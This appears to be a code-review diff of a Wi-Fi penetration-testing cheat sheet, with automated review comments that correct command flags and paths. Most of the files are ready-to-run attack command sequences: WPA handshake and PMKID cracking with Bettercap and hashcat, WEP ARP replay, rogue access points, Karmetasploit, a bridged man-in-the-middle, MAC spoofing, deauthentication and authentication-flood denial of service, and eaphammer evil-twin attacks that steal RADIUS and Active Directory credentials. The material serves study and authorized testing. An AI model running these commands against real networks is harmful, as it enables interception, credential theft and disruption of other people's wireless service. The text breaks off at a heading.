#### Cracking WPA with Bettercap
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# install and update
|
|
||||||
go get github.com/bettercap/bettercap
|
|
||||||
cd $GOPATH/src/github.com/bettercap/bettercap
|
|
||||||
make build && sudo make install
|
|
||||||
sudo bettercap -eval "caplets.update; q"
|
|
||||||
|
|
||||||
# run and recon the wifi APs
|
|
||||||
sudo bettercap -iface wlan0
|
|
||||||
# this will set the interface in monitor mode and start channel hopping on all supported frequencies
|
|
||||||
> wifi.recon on
|
|
||||||
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
|
|
||||||
> set wifi.show.sort clients desc
|
|
||||||
# every second, clear our view and present an updated list of nearby WiFi networks
|
|
||||||
> set ticker.commands 'clear; wifi.show'
|
|
||||||
> ticker on
|
|
||||||
# use the good channel
|
|
||||||
> wifi.recon.channel 1
|
|
||||||
```
|
|
||||||
|
|
||||||
**Bettercap WPA - Deauth and crack**
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# use the bssid of the AP
|
|
||||||
> wifi.deauth e0:xx:xx:xx:xx:xx
|
|
||||||
/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx
|
|
||||||
/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'
|
|
||||||
```
|
|
||||||
|
|
||||||
**Bettercap WPA - PMKID attack**
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
wifi.assoc all
|
|
||||||
/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
|
|
||||||
/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
|
|
||||||
```
|
|
||||||
|
|
||||||
### Additional Aircrack-NG Tools
|
|
||||||
|
|
||||||
#### Remove Wireless Headers
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airdecap-ng -b $AP_MAC open-network.cap
|
|
||||||
* -dec.cap: stripped version of the file
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Decrypt a WEP encrypted capture file
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airdecap-ng -w $WEP_KEY wep.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Decrypt a WPA2 encrypted capture file
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Remote Aircrack Suite
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airserv-ng -p 1337 -c 3 -d mon0
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Wireless Intrusion Detection System
|
|
||||||
|
|
||||||
> Require wireless key and bssid
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
|
|
||||||
# create the at0 interface
|
|
||||||
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
|
|
||||||
# the interface will auto decrypt packets
|
|
||||||
```
|
|
||||||
|
|
||||||
### Wireless Reconnaissance
|
|
||||||
|
|
||||||
> Use CSV file from airodump
|
|
||||||
|
|
||||||
CAPR Graph
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
|
|
||||||
# color
|
|
||||||
- green: wpa
|
|
||||||
- yellow: wep
|
|
||||||
- red: open
|
|
||||||
- black: unknown
|
|
||||||
```
|
|
||||||
|
|
||||||
CPG - Client Probe Graph
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png
|
|
||||||
```
|
|
||||||
|
|
||||||
### Kismet
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
kismet
|
|
||||||
[enter][enter]
|
|
||||||
[tab][close]
|
|
||||||
|
|
||||||
# Select a source and begin a monitoring
|
|
||||||
Kismet > Add source > wlan0 > Add
|
|
||||||
|
|
||||||
.nettxt: data
|
|
||||||
.pcapdump: wireshark format
|
|
||||||
```
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# giskismet: kismet inside a SQL database
|
|
||||||
> require a GPS receiver
|
|
||||||
|
|
||||||
gpsd -n -N -D4 /dev/ttyUSB0
|
|
||||||
-N : foreground
|
|
||||||
-D : debugging level
|
|
||||||
|
|
||||||
# kismet will gather SSID and GPS location
|
|
||||||
giskismet -x kismet.netxml
|
|
||||||
|
|
||||||
# generate a kml file (Google Earth)
|
|
||||||
giskismet -q "select * from wireless" -o allaps.kml
|
|
||||||
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
|
|
||||||
```
|
|
||||||
|
|
||||||
### Rogue Access Point
|
|
||||||
|
|
||||||
#### WPA handshake
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0
|
|
||||||
|
|
||||||
# basic fake AP
|
|
||||||
airbase-ng -c 3 -e $AP_SSID mon0
|
|
||||||
airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0
|
|
||||||
-W 1 : WEP
|
|
||||||
|
|
||||||
# get a WPA handshake if the client connect
|
|
||||||
aircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Karmetasploit
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# install a dhcp server
|
|
||||||
apt install dhcp3-server
|
|
||||||
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0
|
|
||||||
-P: respond to all probes
|
|
||||||
ifconfig at0 up 10.0.0.1/24
|
|
||||||
|
|
||||||
mkdir -p /var/run/dhcpd
|
|
||||||
chown -R dhcpd:dhcpd /var/run/dhcpd
|
|
||||||
touch /var/lib/dhcp3/dhcpd.leases
|
|
||||||
|
|
||||||
"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf
|
|
||||||
|
|
||||||
touch /tmp/dhcp.log
|
|
||||||
chown -R dhcpd:dhcpd /tmp/dhcp.log
|
|
||||||
dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0
|
|
||||||
|
|
||||||
karma.rc from metasploit
|
|
||||||
# comment the first 2 lines (load sqlite)
|
|
||||||
msfconsole -r /root/karma.rc
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Access Point MITM
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3
|
|
||||||
airbase-ng -c 3 -e $AP_SSID_SPOOFED mon0
|
|
||||||
|
|
||||||
# create a bridged interface
|
|
||||||
# apt-get install bridge-utils
|
|
||||||
brctl addbr hacker
|
|
||||||
brctl addif hacker eth0
|
|
||||||
brctl addif hacker at0
|
|
||||||
|
|
||||||
# assign IP addresses
|
|
||||||
ifconfig eth0 0.0.0.0 up
|
|
||||||
ifconfig at0 0.0.0.0 up
|
|
||||||
ifconfig hacker 192.168.1.8 up
|
|
||||||
|
|
||||||
# enable IP forwarding
|
|
||||||
echo 1 > /proc/sys/net/ipv4/ip_forward
|
|
||||||
|
|
||||||
# mitm tools
|
|
||||||
driftnet
|
|
||||||
ettercap -G
|
|
||||||
Sniff > Unified sniffing > Hacker Interface
|
|
||||||
```
|
|
||||||
|
|
||||||
### Other things
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# Find Hidden SSID
|
|
||||||
aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0
|
|
||||||
|
|
||||||
# Mac Filtering
|
|
||||||
macchanger –-mac <VictimMac> wlan0mon
|
|
||||||
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
|
|
||||||
# MAC CHANGER
|
|
||||||
ifconfig wlan0mon down
|
|
||||||
macchanger –-mac <macVictima> wlan0mon
|
|
||||||
ifconfig wlan0mon up
|
|
||||||
|
|
||||||
# Deauth Global
|
|
||||||
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
|
|
||||||
|
|
||||||
# Authentication DoS Mode
|
|
||||||
mdk3 wlan0mon a -a $AP_MAC
|
|
||||||
|
|
||||||
# Tshark - Filter and dislay data
|
|
||||||
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
|
|
||||||
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
|
|
||||||
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
|
|
||||||
|
|
||||||
# Convert .cap with handshake to .hccap
|
|
||||||
aircrack-ng -J network network.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
### References
|
|
||||||
|
|
||||||
* [Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]](https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/)
|
|
||||||
* [Aireplay 0841 Attack – Introduction](https://www.doyler.net/security-not-included/aireplay-0841-attack)
|
|
||||||
* [Preparación para el OSWP (by s4vitar)](https://gist.github.com/s4vitar/3b42532d7d78bafc824fb28a95c8a5eb)
|
|
|
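Review bot: in the Karmetasploit block the DHCP lease-file path does not match the file that was just created: `touch /tmp/dhcp.log` is followed by `dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0`, so dhcpd will fail to open `/tmp/dhcp/log`; use the same path in both places (`-lf /tmp/dhcp.log`, or the `/var/lib/dhcp3/dhcpd.leases` file touched earlier). The `"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf` line writes that literal string into the config; either replace it with a real stanza consistent with `ifconfig at0 up 10.0.0.1/24` (`subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; }`) or mark it as a TODO. In the "Other things" block the option dashes are typographic en-dashes (`aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0`, `macchanger –-mac <VictimMac> wlan0mon`, `aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon`); copied as-is the shell treats `–a` as a positional argument, so they must become plain ASCII `-a`, `--mac`, `-b`. Minor: the "Find Hidden SSID" deauth only reveals the SSID if airodump-ng is capturing the client's reassociation on the same channel, which is worth a comment next to the command.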
@ -0,0 +1,142 @@
|
||||||
|
# Wifi - Basics
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) - WiFi security auditing tools suite
|
||||||
|
* [kimocoder/wifite2](https://github.com/kimocoder/wifite2) - Rewrite of the popular wireless network auditor, "wifite" - original by @derv82
|
||||||
|
* [derv82/wifite2](https://github.com/derv82/wifite2) - Rewrite of the popular wireless network auditor, "wifite"
|
||||||
|
* [derv82/wifite](https://github.com/derv82/wifite) - Wifite is an automated wireless attack tool.
|
||||||
|
|
||||||
|
|
||||||
|
## Linux Wireless Basics
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
AP_MAC="XX:XX:XX:XX:XX" # BSSID
|
||||||
|
VICTIM_MAC="XX:XX:XX:XX:XX" # VIC
|
||||||
|
ATTACKER_MAC="XX:XX:XX:XX:XX" # MON
|
||||||
|
AP_SSID="wifibox" # ESSID
|
||||||
|
SRC_ADDR="192.168.1.1"
|
||||||
|
DST_ADDR="192.168.1.255"
|
||||||
|
```
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# driver install
|
||||||
|
apt install realtek-rtl88xxau-dkms
|
||||||
|
|
||||||
|
# network card recon
|
||||||
|
iwconfig
|
||||||
|
iw list
|
||||||
|
dmesg | grep 8187 # alfa card
|
||||||
|
|
||||||
|
# Increase Wi-Fi TX Power
|
||||||
|
iw reg set B0
|
||||||
|
iwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)
|
||||||
|
|
||||||
|
# find SSID and channel
|
||||||
|
iw dev wlan0 scan | grep SSID
|
||||||
|
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
|
||||||
|
iwlist wlan0 scanning | egrep "ESSID|Channel"
|
||||||
|
|
||||||
|
# monitor mode - start
|
||||||
|
airmon-ng start wlan0
|
||||||
|
airmon-ng start wlan0 3 # only on a particular channel e.g: 3
|
||||||
|
* Manual 1: iw dev wlan0 interface add mon0 type monitor
|
||||||
|
* Manual 2: iwconfig wlan0 mode monitor channel 3
|
||||||
|
ifconfig mon0 up
|
||||||
|
# monitor mode - stop
|
||||||
|
airmon-ng stop mon0
|
||||||
|
* Manual 1: iw dev wlan0 interface del mon0
|
||||||
|
* Manual 2: iwconfig wlan0 mode managed
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Aircrack-ng Essentials
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# check and kill processes that could interfere with our monitor mode
|
||||||
|
airmon-ng check
|
||||||
|
airmon-ng check kill
|
||||||
|
# pkill dhclient; pkill wpa_supplicant; pkill dhclient3
|
||||||
|
|
||||||
|
# list AP
|
||||||
|
airodump-ng mon0
|
||||||
|
airodump-ng mon0 -c 3 # only on a particular channel e.g: 3
|
||||||
|
airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic
|
||||||
|
|
||||||
|
# get our macaddress
|
||||||
|
macchanger -s mon0
|
||||||
|
macchanger --show mon0
|
||||||
|
|
||||||
|
# replay and accelerate traffic
|
||||||
|
aireplay-ng
|
||||||
|
* -i interface
|
||||||
|
* -r file.pcap
|
||||||
|
|
||||||
|
# check aireplay card compatibility
|
||||||
|
aireplay-ng -9 mon0 -> test injection
|
||||||
|
aireplay-ng -9 -i wlan1 mon0 -> test card to card injection
|
||||||
|
|
||||||
|
# injection rate
|
||||||
|
iwconfig wlan0 rate 1M
|
||||||
|
|
||||||
|
# Aircrack compatibility
|
||||||
|
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters
|
||||||
|
Alfa AWUS036H / TPLink WN722
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Fake authentication attack
|
||||||
|
|
||||||
|
:warning: use it before each attack
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0
|
||||||
|
|
||||||
|
# fake authentication = no arp
|
||||||
|
aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
* Might need a real $ATTACKER_MAC, observe traffic using airodump
|
||||||
|
> Association successful! :-)
|
||||||
|
|
||||||
|
# fake authentication for picky AP
|
||||||
|
# Send keep-alive packets every 10 seconds
|
||||||
|
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
|
||||||
|
|
||||||
|
# might need to fake your MAC ADDRESS first
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Deauthentication attack
|
||||||
|
|
||||||
|
> Force ARP packet to be sent.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
||||||
|
* -0 : 1 deauthentication, 0 unlimited
|
||||||
|
> Sending 64 directed DeAuth.
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### ARP Replay Attack
|
||||||
|
|
||||||
|
Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
||||||
|
* ATTACKER_MAC if fake authentication launched
|
||||||
|
* CONNECTED_MAC if a client is associated
|
||||||
|
|
||||||
|
# –x 1000 –n 1000 ?
|
||||||
|
# aireplay-ng -3 –x 1000 –n 1000 –b $AP_MAC -h $ATTACKER_MAC wlan0mon
|
||||||
|
# wait for ARP on the network
|
||||||
|
# alternatively you can de-auth some clients
|
||||||
|
|
||||||
|
aircrack-ng –b <BSSID> <PCAP_of_FileName>
|
||||||
|
aircrack-ng -0 wep1.cap
|
||||||
|
* -0 : colored output
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]](https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/)
|
||||||
|
* [Aireplay 0841 Attack – Introduction](https://www.doyler.net/security-not-included/aireplay-0841-attack)
|
|
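Review bot: the variable block under "Linux Wireless Basics" sets MAC placeholders with five octets (`AP_MAC="XX:XX:XX:XX:XX"`, and the same for `VICTIM_MAC` and `ATTACKER_MAC`); a MAC address has six, so anyone who fills them in by pattern gets an address aireplay-ng rejects. Under "Fake authentication attack", `aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0` is missing the `$` on `AP_SSID` and therefore sends the literal ESSID "AP_SSID"; the WEP file gets this right with `-e $AP_SSID`. In the ARP replay block the commented variant `aireplay-ng -3 –x 1000 –n 1000 –b $AP_MAC -h $ATTACKER_MAC wlan0mon` and `aircrack-ng –b <BSSID> <PCAP_of_FileName>` use en-dashes rather than `-`, which the shell will not parse as options, and the `–x 1000 –n 1000 ?` comment should either explain the flags (injection rate and packet count) or be dropped. The References list repeats the uceka and doyler entries that already close the previous file; consider keeping them in one place.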
@ -0,0 +1,112 @@
|
||||||
|
# Wifi - Enterprise Network
|
||||||
|
|
||||||
|
## WPA and WPA2 EAP
|
||||||
|
|
||||||
|
WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK).
|
||||||
|
|
||||||
|
|
||||||
|
* [s0lst1c3/eaphammer](https://github.com/s0lst1c3/eaphammer) - Targeted evil twin attacks against WPA2-Enterprise networks.
|
||||||
|
```ps1
|
||||||
|
git clone https://github.com/s0lst1c3/eaphammer.git
|
||||||
|
./kali-setup
|
||||||
|
|
||||||
|
# generate certificates
|
||||||
|
./eaphammer --cert-wizard
|
||||||
|
|
||||||
|
# launch attack
|
||||||
|
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
|
||||||
|
```
|
||||||
|
|
||||||
|
* [Stealing RADIUS Credentials Using EAPHammer](https://github.com/s0lst1c3/eaphammer/wiki/II.-Stealing-RADIUS-Credentials-Using-EAPHammer)
|
||||||
|
```ps1
|
||||||
|
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth wpa-eap --creds
|
||||||
|
```
|
||||||
|
|
||||||
|
* [Stealing AD Credentials Using Hostile Portal Attacks](https://github.com/s0lst1c3/eaphammer/wiki/III.-Stealing-AD-Credentials-Using-Hostile-Portal-Attacks)
|
||||||
|
```ps1
|
||||||
|
./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth wpa-eap --hostile-portal
|
||||||
|
./eaphammer --interface wlan0 --essid TotallyLegit --hw-mode n --channel 36 --auth open --hostile-portal
|
||||||
|
```
|
||||||
|
|
||||||
|
* [Performing Captive Portal Attacks - Evil Twin Attacks](https://github.com/s0lst1c3/eaphammer/wiki/V.-Performing-Captive-Portal-Attacks)
|
||||||
|
```ps1
|
||||||
|
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 149 --interface wlan0 --captive-portal
|
||||||
|
./eaphammer --captive-portal -e guestnet -i wlan0 --portal-template rogue-cert-prompt --lhost 10.0.0.10 --payload secure.crt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Rogue Access Point
|
||||||
|
|
||||||
|
### WPA handshake
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0
|
||||||
|
|
||||||
|
# basic fake AP
|
||||||
|
airbase-ng -c 3 -e $AP_SSID mon0
|
||||||
|
airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0
|
||||||
|
-W 1 : WEP
|
||||||
|
|
||||||
|
# get a WPA handshake if the client connect
|
||||||
|
aircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Karmetasploit
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# install a dhcp server
|
||||||
|
apt install dhcp3-server
|
||||||
|
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0
|
||||||
|
-P: respond to all probes
|
||||||
|
ifconfig at0 up 10.0.0.1/24
|
||||||
|
|
||||||
|
mkdir -p /var/run/dhcpd
|
||||||
|
chown -R dhcpd:dhcpd /var/run/dhcpd
|
||||||
|
touch /var/lib/dhcp3/dhcpd.leases
|
||||||
|
|
||||||
|
"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf
|
||||||
|
|
||||||
|
touch /tmp/dhcp.log
|
||||||
|
chown -R dhcpd:dhcpd /tmp/dhcp.log
|
||||||
|
dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0
|
||||||
|
|
||||||
|
karma.rc from metasploit
|
||||||
|
# comment the first 2 lines (load sqlite)
|
||||||
|
msfconsole -r /root/karma.rc
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Access Point MITM
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airbase-ng -c 3 -e $AP_SSID_SPOOFED mon0
|
||||||
|
|
||||||
|
# create a bridged interface
|
||||||
|
# apt-get install bridge-utils
|
||||||
|
brctl addbr hacker
|
||||||
|
brctl addif hacker eth0
|
||||||
|
brctl addif hacker at0
|
||||||
|
|
||||||
|
# assign IP addresses
|
||||||
|
ifconfig eth0 0.0.0.0 up
|
||||||
|
ifconfig at0 0.0.0.0 up
|
||||||
|
ifconfig hacker 192.168.1.8 up
|
||||||
|
|
||||||
|
# enable IP forwarding
|
||||||
|
echo 1 > /proc/sys/net/ipv4/ip_forward
|
||||||
|
|
||||||
|
# mitm tools
|
||||||
|
driftnet
|
||||||
|
ettercap -G
|
||||||
|
Sniff > Unified sniffing > Hacker Interface
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [TODO](#)
|
|
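Review bot: in "Rogue Access Point / WPA handshake" the flag comment is wrong for the stated goal: `airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0` is annotated `-W 1 : WEP`, but `-W 1` only sets the privacy bit in the beacon; the WPA part comes from `-z 4` (WPA1 with CCMP), and a WPA2 target needs `-Z 4`, so the comment should read along the lines of `-z 4 : WPA1 CCMP, -Z 4 : WPA2 CCMP, -W 1 : set privacy bit`. In the Karmetasploit block `airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0` passes the AP's MAC where `-e` expects an ESSID (`$AP_SSID`); with `-P` the ESSID barely matters, but the variable name is misleading. The dhcpd lines carry the same lease-path mismatch as the old file (`touch /tmp/dhcp.log` followed by `-lf /tmp/dhcp/log`) and the `"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf` placeholder, and `apt install dhcp3-server` is the pre-Squeeze package name: current Debian and Kali ship `isc-dhcp-server` with a `dhcpd` binary, not `dhcpd3`. The References section is `[TODO](#)`; the eaphammer wiki pages linked above are the natural entries.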
@ -0,0 +1,122 @@
|
||||||
|
# Wifi - Additional Tricks and Tools
|
||||||
|
|
||||||
|
## Additional Aircrack-NG Tools
|
||||||
|
|
||||||
|
### Remove Wireless Headers
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airdecap-ng -b $AP_MAC open-network.cap
|
||||||
|
* -dec.cap: stripped version of the file
|
||||||
|
```
|
||||||
|
|
||||||
|
### Decrypt a WEP encrypted capture file
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airdecap-ng -w $WEP_KEY wep.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
### Decrypt a WPA2 encrypted capture file
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap
|
||||||
|
```
|
||||||
|
|
||||||
|
### Remote Aircrack Suite
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
airserv-ng -p 1337 -c 3 -d mon0
|
||||||
|
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
|
||||||
|
```
|
||||||
|
|
||||||
|
### Wireless Intrusion Detection System
|
||||||
|
|
||||||
|
> Require wireless key and bssid
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airmon-ng start wlan0 3
|
||||||
|
|
||||||
|
# create the at0 interface
|
||||||
|
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
|
||||||
|
# the interface will auto decrypt packets
|
||||||
|
```
|
||||||
|
|
||||||
|
## Wireless Reconnaissance
|
||||||
|
|
||||||
|
> Use CSV file from airodump
|
||||||
|
|
||||||
|
CAPR Graph
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
|
||||||
|
# color
|
||||||
|
- green: wpa
|
||||||
|
- yellow: wep
|
||||||
|
- red: open
|
||||||
|
- black: unknown
|
||||||
|
```
|
||||||
|
|
||||||
|
CPG - Client Probe Graph
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png
|
||||||
|
```
|
||||||
|
|
||||||
|
## Kismet
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
kismet
|
||||||
|
[enter][enter]
|
||||||
|
[tab][close]
|
||||||
|
|
||||||
|
# Select a source and begin a monitoring
|
||||||
|
Kismet > Add source > wlan0 > Add
|
||||||
|
|
||||||
|
.nettxt: data
|
||||||
|
.pcapdump: wireshark format
|
||||||
|
```
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# giskismet: kismet inside a SQL database
|
||||||
|
> require a GPS receiver
|
||||||
|
|
||||||
|
gpsd -n -N -D4 /dev/ttyUSB0
|
||||||
|
-N : foreground
|
||||||
|
-D : debugging level
|
||||||
|
|
||||||
|
# kismet will gather SSID and GPS location
|
||||||
|
giskismet -x kismet.netxml
|
||||||
|
|
||||||
|
# generate a kml file (Google Earth)
|
||||||
|
giskismet -q "select * from wireless" -o allaps.kml
|
||||||
|
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
|
||||||
|
```
|
||||||
|
|
||||||
|
## Other things
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Find Hidden SSID
|
||||||
|
aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0
|
||||||
|
|
||||||
|
# Mac Filtering
|
||||||
|
macchanger –-mac <VictimMac> wlan0mon
|
||||||
|
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
|
||||||
|
# MAC CHANGER
|
||||||
|
ifconfig wlan0mon down
|
||||||
|
macchanger –-mac <macVictima> wlan0mon
|
||||||
|
ifconfig wlan0mon up
|
||||||
|
|
||||||
|
# Deauth Global
|
||||||
|
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
|
||||||
|
|
||||||
|
# Authentication DoS Mode
|
||||||
|
mdk3 wlan0mon a -a $AP_MAC
|
||||||
|
|
||||||
|
# Tshark - Filter and dislay data
|
||||||
|
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
|
||||||
|
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
|
||||||
|
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
|
||||||
|
|
||||||
|
# Convert .cap with handshake to .hccap
|
||||||
|
aircrack-ng -J network network.cap
|
||||||
|
```
|
|
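Review bot: the "Other things" block is a verbatim copy of the block removed from the old file, typographic dashes included: `aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0`, `macchanger –-mac <VictimMac> wlan0mon` and `aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon` will not parse as options until `–` becomes `-` (`-a`, `--mac`, `-b`). The "Mac Filtering" and "MAC CHANGER" sub-blocks say the same thing with different placeholder names (`<VictimMac>` versus `<macVictima>`); merge them and keep the `ifconfig wlan0mon down` / `up` pair, since macchanger fails on an interface that is up. "Tshark - Filter and dislay data" has a typo (display). `aircrack-ng -J network network.cap` produces the legacy `.hccap` format; hashcat has deprecated the 2500/16800 modes in favour of the 22000 format written by `hcxpcapngtool`, so the comment should say the conversion is for old hashcat or John only. Under "Wireless Intrusion Detection System" the heading does not match the content: `airtun-ng -a $AP_MAC -w $WEP_KEY mon0` creates a decrypting tap interface (`at0`) you can point an IDS or sniffer at, which is the prerequisite for an IDS rather than one itself, and the blockquote `Require wireless key and bssid` would read better as a sentence.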
@ -0,0 +1,175 @@
|
||||||
|
# Wifi - WEP Cracking
|
||||||
|
|
||||||
|
## Cracking WEP with a Client
|
||||||
|
|
||||||
|
### ARP Request Replay Attack
